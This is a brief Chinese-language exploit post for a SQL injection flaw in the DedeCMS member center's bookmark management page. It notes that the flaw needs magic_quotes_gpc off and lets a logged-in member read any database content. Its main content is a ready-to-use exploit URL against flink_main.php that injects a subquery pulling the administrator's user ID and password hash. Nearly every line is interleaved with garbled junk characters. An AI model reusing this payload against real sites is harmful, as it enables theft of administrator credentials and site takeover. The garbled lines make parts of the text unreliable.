DedeCMS会员中心SQL注射漏洞
2 _( P/ \4 ^8 u" U5 W, k需要magic_quotes_gpc = Off3 q" r# Z9 @; E/ ]& k5 J
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
$ d7 R+ o# |" @- j" ~- i7 S / V8 g- @$ w s, n! p1 X& c
DedeCMS会员中心书签管理SQL注射漏洞! ]+ T7 c, A- J8 x$ l
成功利用该漏洞可获得管理员密码
+ t# K e( X# [9 [" d
& W$ s/ j$ n5 A会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
6 ], }5 l) Z7 o- D' o V% D0 O* z
3 h# Z4 z% K. L& a! \8 H$ ]http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
' N% e! ~6 w9 ?" w& A3 { |